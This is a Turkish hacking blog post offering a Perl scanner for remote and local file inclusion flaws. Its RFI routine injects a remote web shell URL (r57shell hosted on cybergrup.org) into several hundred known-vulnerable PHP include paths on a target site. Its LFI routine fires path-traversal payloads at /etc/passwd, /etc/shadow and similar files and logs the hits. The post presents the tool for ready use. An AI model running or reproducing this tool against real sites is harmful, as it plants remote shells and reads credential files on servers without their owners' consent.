aytach RFI & LFI Scanner (perL)

Yazar: King_Wolf Security Pages Yorum Yap 1 Mayıs 2009 Cuma
Aytach kardeşimizin yazdıgı Rfi & LFI Scanner perl dilinde olmasıyla birlikte çok kullanışlıdır devamını okuyarak perl dosyasına ulaşabilirsiniz.


#!/usr/bin/perl
# aytach rfi&lfi scanner
#
# aytachacar@hotmail.com
#
# http://cybergrup.org & http://heyktoolz.com
# http://darkc0de.com & http://hack0wn.com
#
################################################################

$sil="$^O";if (@sil eq unix) {$console="clear";} else {$console = "cls"; } system("$console");
#Kütüphaneleri Girelim

use LWP::UserAgent;
use HTTP::Request;

#Tanıtım Yapalım Biraz :D :D
print "\t\t#################################################\n";
print "\t\t aytach rfi & lfi scanner #\n";
print "\t\t###http://cybergrup.org & http://heyktoolz.com###\n";
print "\t\t####http://darkc0de.com & http://hack0wn.com#####\n";
print "\t\t SuSKuN & MAVE_RICK & MaDHuNTeR & KiNG_WoLF \n";
print "\t\t JoSs & cr@zy_king & SMaCKeR \n";
print "\t\t 1==rfi , 2==lfi \n";
print "\t\t#################################################\n";
temizle:



#Şimdi rfi lfi arayacağımızdan seçim yapalım

print "Ne Yapacaksın:\n\n";
print "secim: ";
$secim=;
#seçim i yapıyoruz
if ($secim==1)
{(&rfi)}
if ($secim==2)
{(&lfi)}



#ilk seçim ise Rfi başlasın buradan itibaren

sub rfi
{
print "\t\t################\n";
print "\t\t#rfi'yi sectiniz#\n";
print "\t\t################\n";
print "\n\n";
print "\t Siteyi Yaz (ex: www.site.com)\n";
print "\t Site :\n";
$site=;
chomp($site);
if($site !~ /http:///) { $site = "http://$site"; };

print "\n\n";
print "Rfi scanning...";
print "\n\n";

@rfi = ('index.php?x_page=','components/com_flyspray/startdown.php?file=','administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=','components/com_simpleboard/file_upload.php?sbp=','components/com_hashcash/server.php?mosConfig_absolute_path=','components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=','components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=','components/com_performs/performs.php?mosConfig_absolute_path=','components/com_forum/download.php?phpbb_root_path=','components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=','components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=','components/minibb/index.php?absolute_path=','components/com_smf/smf.php?mosConfig_absolute_path=','modules/mod_calendar.php?absolute_path=','components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=','components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=','components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=','components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=','administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=','administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=','components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=','components/com_securityimages/configinsert.php?mosConfig_absolute_path=','components/com_securityimages/lang.php?mosConfig_absolute_path=','components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=','components/com_galleria/galleria.html.php?mosConfig_absolute_path=','akocomments.php?mosConfig_absolute_path=','administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=','cropcanvas.php?cropimagedir=','administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=','administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=','components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=','components/com_zoom/includes/database.php?mosConfig_absolute_path=','administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=','components/com_fm/fm.install.php?lm_absolute_path=','administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=','components/com_lmo/lmo.php?mosConfig_absolute_path=','administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=','components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=','administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=','administrator/components/com_webring/admin.webring.docs.php?component_dir=','administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=','administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=','administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=','components/com_mambowiki/MamboLogin.php?IP=','administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=','administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=','components/com_cpg/cpg.php?mosConfig_absolute_path=','components/com_moodle/moodle.php?mosConfig_absolute_path=','components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=','components/com_mospray/scripts/admin.php?basedir=','administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=','administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=','administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=','administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=','components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=','components/com_madeira/img.php?url=','components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=','components/com_bsq_sitestats/external/rssfeed.php?baseDir=','com_bsq_sitestats/external/rssfeed.php?baseDir=','components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=','administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=','components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=','administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=','components/com_joomlaboard/file_upload.php?sbp=','components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=','components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=','components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=','components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=','components/com_thopper/inc/request_type.php?mosConfig_absolute_path=','components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=','components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=','components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=','components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=','components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=','modules/mod_weather.php?absolute_path=','components/calendar/com_calendar.php?absolute_path=','modules/calendar/mod_calendar.php?absolute_path=','components/com_calendar.php?absolute_path=','modules/mod_calendar.php?absolute_path=','components/com_mosmedia/media.tab.php?mosConfig_absolute_path=','components/com_mosmedia/media.divs.php?mosConfig_absolute_path=','administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=','administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=','administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=','components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=','administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=','administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=','administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=','administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=','administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=','administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=','administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=','administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=','administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=','index/wp-content/plugins/Enigma2.php?boarddir=','mygallery/myfunctions/mygallerybrowser.php?myPath=','plugins/wp-table/js/wptable-button.phpp?wpPATH=','plugins/wordtube/wordtube-button.php?wpPATH=','plugins/myflash/myflash-button.php?wpPATH=','plugins/BackUp/Archive.php?bkpwp_plugin_path=','plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=','plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=','plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=','plugins/sniplets/modules/syntax_highlight.php?libpath=','path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=','includes/functions_portal.php?phpbb_root_path=','includes/functions_mod_user.php?phpbb_root_path=','includes/openid/Auth/OpenID/BBStore.php?openid_root_path=','language/lang_german/lang_main_album.php?phpbb_root_path=','ink_main.php?phpbb_root_path=','inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=','MOD_forum_fields_parse.php?phpbb_root_path=','codebb/pass_code.php?phpbb_root_path=','codebb/lang_select?phpbb_root_path=','includes/functions_nomoketos_rules.php?phpbb_root_path=','includes/functions.php?phpbb_root_path=','includes/functions.php?phpbb_root_path=','ezconvert/config.php?ezconvert_dir=','includes/class_template.php?phpbb_root_path=','includes/usercp_viewprofile.php?phpbb_root_path=','includes/functions.php?phpbb_root_path=','includes/functions.php?phpbb_root_path=','menu.php?sesion_idioma=','includes/functions.php?phpbb_root_path=','admin/admin_linkdb.php?phpbb_root_path=','admin/admin_forum_prune.php?phpbb_root_path=','admin/admin_extensions.php?phpbb_root_path=','admin/admin_board.php?phpbb_root_path=','admin/admin_attachments.php?phpbb_root_path=','admin/admin_users.php?phpbb_root_path=','includes/archive/archive_topic.php?phpbb_root_path=','admin/modules_data.php?phpbb_root_path=','faq.php?foing_root_path=','index.php?foing_root_path=','list.php?foing_root_path=','login.php?foing_root_path=','playlist.php?foing_root_path=','song.php?foing_root_path=','gen_m3u.php?foing_root_path=','view_artist.php?foing_root_path=','view_song.php?foing_root_path=','login.php?foing_root_path=','playlist.php?foing_root_path=','song.php?foing_root_path=','flash/set_na.php?foing_root_path=','flash/initialise.php?foing_root_path=','flash/get_song.php?foing_root_path=','includes/common.php?foing_root_path=','admin/nav.php?foing_root_path=','admin/main.php?foing_root_path=','admin/list_artists.php?foing_root_path=','admin/index.php?foing_root_path=','admin/genres.php?foing_root_path=','admin/edit_artist.php?foing_root_path=','admin/edit_album.php?foing_root_path=','admin/config.php?foing_root_path=','admin/admin_status.php?foing_root_path=','language/lang_english/lang_prillian_faq.php?phpbb_root_path=','includes/functions_mod_user.php?phpbb_root_path=','language/lang_french/lang_prillian_faq.php?phpbb_root_path=','includes/archive/archive_topic.php?phpbb_root_path=','functions_rpg_events.php?phpbb_root_path=','admin/admin_spam.php?phpbb_root_path=','includes/functions_newshr.php?phpbb_root_path=','zufallscodepart.php?phpbb_root_path=','mods/iai/includes/constants.php?phpbb_root_path=','root/includes/antispam.php?phpbb_root_path=','phpBB2/shoutbox.php?phpbb_root_path=','includes/functions_mod_user.php?phpbb_root_path=','includes/functions_mod_user.php?phpbb_root_path=','includes/journals_delete.php?phpbb_root_path=','includes/journals_post.php?phpbb_root_path=','includes/journals_edit.php?phpbb_root_path=','includes/functions_num_image.php?phpbb_root_path=','includes/functions_user_viewed_posts.php?phpbb_root_path=','includes/themen_portal_mitte.php?phpbb_root_path=','includes/logger_engine.php?phpbb_root_path=','includes/logger_engine.php?phpbb_root_path=','includes/functions_static_topics.php?phpbb_root_path=','admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=','includes/functions_kb.php?phpbb_root_path=','includes/bbcb_mg.php?phpbb_root_path=','admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=','includes/pafiledb_constants.php?module_root_path=','index.php?phpbb_root_path=','song.php?phpbb_root_path=','faq.php?phpbb_root_path=','list.php?phpbb_root_path=','gen_m3u.php?phpbb_root_path=','playlist.php?phpbb_root_path=','language/lang_english/lang_activity.php?phpbb_root_path=','language/lang_english/lang_activity.php?phpbb_root_path=','blend_data/blend_common.php?phpbb_root_path=','blend_data/blend_common.php?phpbb_root_path=','modules/Forums/admin/index.php?phpbb_root_path=','modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=','modules/Forums/admin/admin_board.php?phpbb_root_path=','modules/Forums/admin/admin_disallow.php?phpbb_root_path=','modules/Forums/admin/admin_forumauth.php?phpbb_root_path=','modules/Forums/admin/admin_groups.php?phpbb_root_path=','modules/Forums/admin/admin_ranks.php?phpbb_root_path=','modules/Forums/admin/admin_styles.php?phpbb_root_path=','modules/Forums/admin/admin_user_ban.php?phpbb_root_path=','modules/Forums/admin/admin_words.php?phpbb_root_path=','modules/Forums/admin/admin_avatar.php?phpbb_root_path=','modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=','modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=','modules/Forums/admin/admin_forums.php?phpbb_root_path=','modules/Forums/admin/admin_mass_email.php?phpbb_root_path=','modules/Forums/admin/admin_smilies.php?phpbb_root_path=','modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=','modules/Forums/admin/admin_users.php?phpbb_root_path=','stat_modules/users_age/module.php?phpbb_root_path=','includes/functions_cms.php?phpbb_root_path=','m2f/m2f_phpbb204.php?m2f_root_path=','m2f/m2f_forum.php?m2f_root_path=','m2f/m2f_mailinglist.php?m2f_root_path=','m2f/m2f_cron.php?m2f_root_path=','lib/phpbb.php?subdir=','includes/functions_mod_user.php?phpbb_root_path=','includes/functions.php?phpbb_root_path=','includes/functions_portal.php?phpbb_root_path=','includes/functions.php?phpbb_root_path=','includes/functions_admin.php?phpbb_root_path=','toplist.php?f=toplist_top10&phpbb_root_path=','admin/addentry.php?phpbb_root_path=','includes/kb_constants.php?module_root_path=','auth/auth.php?phpbb_root_path=','auth/auth_phpbb/phpbb_root_path=','auction/auction_common.php?phpbb_root_path=','auth/auth_SMF/smf_root_path=','auth/auth.php?smf_root_path=','index.php?fq=','includes/header.php?systempath=','Gallery/displayCategory.php?basepath=','index.inc.php?PATH_Includes=','nphp/nphpd.php?nphp_config[LangFile]=','include/db.php?GLOBALS[rootdp]=','kopshti/?f=','ashnews.php?pathtoashnews=','ashheadlines.php?pathtoashnews=','modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=','demo/includes/init.php?user_inc=','jaf/index.php?show=','inc/shows.inc.php?cutepath=','poll/admin/common.inc.php?base_path=','pollvote/pollvote.php?pollname=','sources/post.php?fil_config=','modules/My_eGallery/public/displayCategory.php?basepath=','bb_lib/checkdb.inc.php?libpach=','include/livre_include.php?no_connectlol&chem_absolu=','index.php?from_marketY&pageurl=','modules/mod_mainmenu.php?mosConfig_absolute_path=','pivot/modules/module_db.php?pivot_path=','modules/nAlbum/public/displayCategory.php?basepath=','derniers_commentaires.php?rep=','index.php?z=','index.php?strana=','modules/coppermine/themes/default/theme.php?THEME_DIR=','modules/coppermine/include/init.inc.php?CPG_M_DIR=','modules/coppermine/themes/coppercop/theme.php?THEME_DIR=','coppermine/themes/maze/theme.php?THEME_DIR=','allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=','allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=','myPHPCalendar/admin.php?cal_dir=','agendax/addevent.inc.php?agendax_path=','modules/mod_mainmenu.php?mosConfig_absolute_path=','modules/PNphpBB/includes/functions_admin.php?phpbb_root_path=','main.php?page=','default.php?page=','index.php?action=','index.php?p=','index.php?x=','index.php?content=','index.php?conteudo=','index.php?cat=','include/new-visitor.inc.php?lvc_include_dir=','modules/agendax/addevent.inc.php?agendax_path=','shoutbox/expanded.php?conf=','modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=','pivot/modules/module_db.php?pivot_path=','library/editor/editor.php?root=','library/lib.php?root=','e/e_handlers/secure_img_render.php?p=','zentrack/index.php?configFile=','main.php?x=','becommunity/community/index.php?pageurl=','GradeMap/index.php?page=','phpopenchat/contrib/yabbse/poc.php?sourcedir=','calendar/calendar.php?serverPath=','calendar/functions/popup.php?serverPath=','calendar/events/header.inc.php?serverPath=','calendar/events/datePicker.php?serverPath=','calendar/setup/setupSQL.php?serverPath=','calendar/setup/header.inc.php?serverPath=','mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=','zentrack/index.php?configFile=','pivot/modules/module_db.php?pivot_path=','inc/header.php/step_one.php?server_inc=','install/index.php?lng../../include/main.inc&G_PATH=','inc/pipe.php?HCL_path=','include/write.php?dir=','include/new-visitor.inc.php?lvc_include_dir=','includes/header.php?systempath=','support/mailling/maillist/inc/initdb.php?absolute_path=','coppercop/theme.php?THEME_DIR=','zentrack/index.php?configFile=','pivot/modules/module_db.php?pivot_path=','inc/header.php/step_one.php?server_inc=','install/index.php?lng../../include/main.inc&G_PATH=','inc/pipe.php?HCL_path=','include/write.php?dir=','include/new-visitor.inc.php?lvc_include_dir=','includes/header.php?systempath=','support/mailling/maillist/inc/initdb.php?absolute_path=','coppercop/theme.php?THEME_DIR=','becommunity/community/index.php?pageurl=','shoutbox/expanded.php?conf=','agendax/addevent.inc.php?agendax_path=','myPHPCalendar/admin.php?cal_dir=','yabbse/Sources/Packages.php?sourcedir=','dotproject/modules/projects/addedit.php?root_dir=','dotproject/modules/projects/view.php?root_dir=','dotproject/modules/projects/vw_files.php?root_dir=','dotproject/modules/tasks/addedit.php?root_dir=','dotproject/modules/tasks/viewgantt.php?root_dir=','My_eGallery/public/displayCategory.php?basepath=','modules/My_eGallery/public/displayCategory.php?basepath=','modules/nAlbum/public/displayCategory.php?basepath=','modules/coppermine/themes/default/theme.php?THEME_DIR=','modules/agendax/addevent.inc.php?agendax_path=','modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=','modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=','modules/coppermine/include/init.inc.php?CPG_M_DIR=','modules/mod_mainmenu.php?mosConfig_absolute_path=','shoutbox/expanded.php?conf=','pivot/modules/module_db.php?pivot_path=','library/editor/editor.php?root=','library/lib.php?root=','e/e_handlers/secure_img_render.php?p=','main.php?x=','main.php?page=','index.php?meio.php=','index.php?include=','index.php?inc=','index.php?page=','index.php?pag=','index.php?p=','index.php?x=','index.php?open=','index.php?visualizar=','index.php?pagina=','index.php?content=','inc/step_one_tables.php?server_inc=','GradeMap/index.php?page=','phpshop/index.php?base_dir=','admin.php?cal_dir=','contacts.php?cal_dir=','convert-date.php?cal_dir=','album_portal.php?phpbb_root_path=','mainfile.php?MAIN_PATH=','dotproject/modules/files/index_table.php?root_dir=','html/affich.php?base=','gallery/init.php?HTTP_POST_VARS=','pm/lib.inc.php?pm_path=','ideabox/include.php?gorumDir=','index.php?includes_dir=','forums/toplist.php?phpbb_root_path=','forum/toplist.php?phpbb_root_path=','admin/config_settings.tpl.php?include_path=','include/common.php?include_path=','event/index.php?page=','forum/index.php?includeFooter=','forums/index.php?includeFooter=','forum/bb_admin.php?includeFooter=','forums/bb_admin.php?includeFooter=','language/lang_english/lang_activity.php?phpbb_root_path=','forum/language/lang_english/lang_activity.php?phpbb_root_path=','blend_data/blend_common.php?phpbb_root_path=','master.php?root_path=','includes/kb_constants.php?module_root_path=','forum/includes/kb_constants.php?module_root_path=','forums/includes/kb_constants.php?module_root_path=','classes/adodbt/sql.php?classes_dir=','agenda.php?rootagenda=','agenda.php?rootagenda=','sources/lostpw.php?CONFIG[path]=','topsites/sources/lostpw.php?CONFIG[path]=','toplist/sources/lostpw.php?CONFIG[path]=','sources/join.php?CONFIG[path]=','topsites/sources/join.php?CONFIG[path]=','toplist/sources/join.php?CONFIG[path]=','topsite/sources/join.php?CONFIG[path]=','public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=','extras/poll/poll.php?file_newsportal=','index.php?site_path=','mail/index.php?site_path=','fclick/show.php?path=','show.php?path=','calogic/reconfig.php?GLOBALS[CLPath]=','eshow.php?Config_rootdir=','auction/auction_common.php?phpbb_root_path=','index.php?inc_dir=','calendar/index.php?inc_dir=','modules/TotalCalendar/index.php?inc_dir=','modules/calendar/index.php?inc_dir=','calendar/embed/day.php?path=','ACalendar/embed/day.php?path=','calendar/add_event.php?inc_dir=','claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=','claroline/auth/ldap/authldap.php?includePath=','docebo/modules/credits/help.php?lang=','modules/credits/help.php?lang=','config.php?returnpath=','editsite.php?returnpath=','in.php?returnpath=','addsite.php?returnpath=','includes/pafiledb_constants.php?module_root_path=','phpBB/includes/pafiledb_constants.php?module_root_path=','pafiledb/includes/pafiledb_constants.php?module_root_path=','auth/auth.php?phpbb_root_path=','auth/auth_phpbb/phpbb_root_path=','apc-aa/cron.php?GLOBALS[AA_INC_PATH]=','apc-aa/cached.php?GLOBALS[AA_INC_PATH]=','infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=','phpdig/includes/config.php?relative_script_path=','includes/phpdig/includes/config.php?relative_script_path=','includes/dbal.php?eqdkp_root_path=','eqdkp/includes/dbal.php?eqdkp_root_path=','dkp/includes/dbal.php?eqdkp_root_path=','include/SQuery/gameSpy.php?libpath=','include/global.php?GLOBALS[includeBit]=','topsites/config.php?returnpath=','manager/frontinc/prepend.php?_PX_config[manager_path]=','ubbthreads/addpost_newpoll.php?addpollthispath=','forum/addpost_newpoll.php?thispath=','forums/addpost_newpoll.php?thispath=','ubbthreads/ubbt.inc.php?thispath=','forums/ubbt.inc.php?thispath=','forum/ubbt.inc.php?thispath=','forum/admin/addentry.php?phpbb_root_path=','admin/addentry.php?phpbb_root_path=','index.php?f=','index.php?act=','ipchat.php?root_path=','includes/orderSuccess.inc.php?glob[rootDir]=','stats.php?dir[func]dir[base]=','ladder/stats.php?dir[base]=','ladders/stats.php?dir[base]=','sphider/admin/configset.php?settings_dir=','admin/configset.php?settings_dir=','vwar/admin/admin.php?vwar_root=','modules/vwar/admin/');
foreach $ara(@rfi){
$shell = "http://cybergrup.org/sh3LL/140.txt?";
$url = $site.$ara.$shell;

$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);

if ($response->is_success && $response->content =~ /r57shell/ ) { $msg = $url}
else { $msg = "Not Found";}
print "$scan..........[$msg]\n";
}
goto temizle;
}

#Secim 2 Lfi(local file inclusion) özellik kattık bütün olabilecek ihtimalleri değerlendiriyor

sub lfi
{
print "\t\t################\n";
print "\t\t#lfi'yi sectiniz#\n";
print "\t\t################\n";
print "\n\n";
print "\t Siteyi Yaz (ex: www.site.com/index.php?id=)\n";
print "\t Site :\n";
$site=;
chomp($site);
if($site !~ /http:///) { $site = "http://$site"; };

print "\n\n";
print "LFİ scanning...";
print "\n\n";

@local = ('../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user','../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user');

foreach $loc(@local) {

$url = $site.$loc;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);

if ($response->is_success && $response->content =~ /root:x:/ ) { $msg = $url; open (a,">>lfilist.txt"); print a "$url\n"; close (a);}
else { $msg = "Not Found";}
print "$scan..........[$msg]\n";

}
goto temizle;
}


iyi günlerde kullanınız :)
Yazıyı paylaş:  
StumpleUpon DiggIt! Del.icio.us Yahoo TechnoratiReddit Google Twitter Friend Feed Facebook

Bu yazıya yorum yapılmamış. İlk yorumu yapan siz olun!
:)) ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( =))

Yorum Gönder

Yorumlarınızı esirgemeyiniz, sizin de bu yazı hakkındaki düşüncelerinizi belirtme hakkınız var.
Lütfen yorumlarken, kişi ve kurum haklarını zedeleyici kelimeler kullanmayınız!

: ) -> :) , : D -> :D , : P -> :P ,
: ( -> :( , ; ) -> ;)

Hakkımda

Fotoğrafım
6 yıldır hack ve security alanında yoğunlaştım.Bir çok şey gördüm geçirdim son günlerime yakında sizleri bilgilendirmek amacıyla açtım bunu
iyinet frmtr trkygnclr webmaster seo yarışması | iyinet frmtr trkygnclr webmaster seo yarışması | iyinet frmtr trkygnclr webmaster seo yarışması | iyinet frmtr trkygnclr webmaster seo yarışması